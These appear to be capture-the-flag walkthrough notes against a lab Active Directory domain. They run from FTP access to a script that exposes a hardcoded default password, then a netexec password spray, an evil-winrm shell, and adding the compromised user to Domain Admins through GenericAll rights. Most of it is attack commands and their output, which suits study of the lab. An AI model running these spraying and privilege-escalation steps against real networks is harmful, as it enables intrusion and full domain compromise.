```rust
 ftp ftpuser@192.168.1.2
Connected to 192.168.1.2.
220-FileZilla Server 1.6.7
220 Please visit https://filezilla-project.org/
331 Please, specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||62829|)
150 Starting data transfer.
-rw-rw-rw- 1 ftp ftp             601 Feb 24  2023 AddUsers.ps1
-rw-rw-rw- 1 ftp ftp            4998 Feb 24  2023 Users.csv
226 Operation successful
ftp> get AddUsers.ps1
local: AddUsers.ps1 remote: AddUsers.ps1
229 Entering Extended Passive Mode (|||56209|)
150 Starting data transfer.
100% |********************************************************************|   601        9.55 MiB/s    00:00 ETA
226 Operation successful
601 bytes received in 00:00 (4.00 MiB/s)
ftp> get Users.csv
local: Users.csv remote: Users.csv
229 Entering Extended Passive Mode (|||63188|)
150 Starting data transfer.
100% |********************************************************************|  4998       57.42 MiB/s    00:00 ETA
226 Operation successful
4998 
```

```rust
❯ cat AddUsers.ps1
Import-Module ActiveDirectory

$ADUsers = Import-Csv C:\ftp\users.csv -Delimiter ";"
foreach($User in $ADUsers) {
  $firstname = $User.firstname
  $lastname = $User.lastname
  $username = $firstname.substring(0,1).tolower() + $lastname.tolower()
  $password = "XDR%6yhnMKO)"

  if(Get-ADUser -F { SamAccountName -eq $username }) {
    Write-Warning "User $username already exists."
  }
  else {
    New-ADUser -SamAccountName $username -Name "$firstname $lastname" -Enabled $true -AccountPassword (ConvertTo-secureString $password -AsPlainText -Force)
    Write-Host "User $username created."
  }
}
```

netexec
```rust
 netexec smb 192.168.1.2 -u users.txt -p 'XDR%6yhnMKO)'
SMB         192.168.1.2     445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:orion.smallcorp.htb) (signing:True) (SMBv1:False)
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\flastname:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mgiles:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\drodriguez:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jflores:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\awright:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\rcarey:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\sbates:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\tlove:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\lhayes:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\efranklin:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jweaver:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\blloyd:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\tgardner:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jowens:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mmccormick:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\rphillips:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\cmccullough:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\rgray:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\ekennedy:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\adavis:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\dcastillo:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\ahernandez:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\ahiggins:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jhuber:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jlewis:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jjennings:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\wdawson:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\candrade:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\athompson:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\csnyder:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\ccruz:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mking:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jorr:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\scastillo:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\kmartinez:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jmurphy:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jwalker:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mhale:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\lgomez:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\bsalas:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\pbenton:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\lwilliams:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\cpratt:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\agriffin:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\awillis:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\ihowell:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mspencer:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mhines:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jwalton:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\mallen:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [-] orion.smallcorp.htb\jfreeman:XDR%6yhnMKO) STATUS_LOGON_FAILURE
SMB         192.168.1.2     445    DC               [+] orion.smallcorp.htb\lmicalabla:XDR%6yhnMKO)
```

```rust
 evil-winrm -i 192.168.1.2 -u 'lmicalabla' -p 'XDR%6yhnMKO)'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\lmicalabla\Documents> ls
*Evil-WinRM* PS C:\Users\lmicalabla\Documents> cd ..
*Evil-WinRM* PS C:\Users\lmicalabla> cd desktop
*Evil-WinRM* PS C:\Users\lmicalabla\desktop> ls


    Directory: C:\Users\lmicalabla\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/26/2023  11:07 PM             48 flag.txt


*Evil-WinRM* PS C:\Users\lmicalabla\desktop>
```

```rust
*Evil-WinRM* PS C:\Users\lmicalabla\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ===========================================
orion\lmicalabla S-1-5-21-775547830-308377188-957446042-1159


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                         Attributes
========================================== ================ =========================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                     Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                    Mandatory group, Enabled by default, Enabled group
ORION\Sysadmins                            Group            S-1-5-21-775547830-308377188-957446042-1437 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

![[Pasted image 20241010211339.png]]

GenericAll to Domain Admins

```rust
 net group "Domain Admins" /domain lmicalabla /add
```

log off and back in
```
*Evil-WinRM* PS C:\Users\lmicalabla\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
*Evil-WinRM* PS C:\Users\lmicalabla\Documents>
```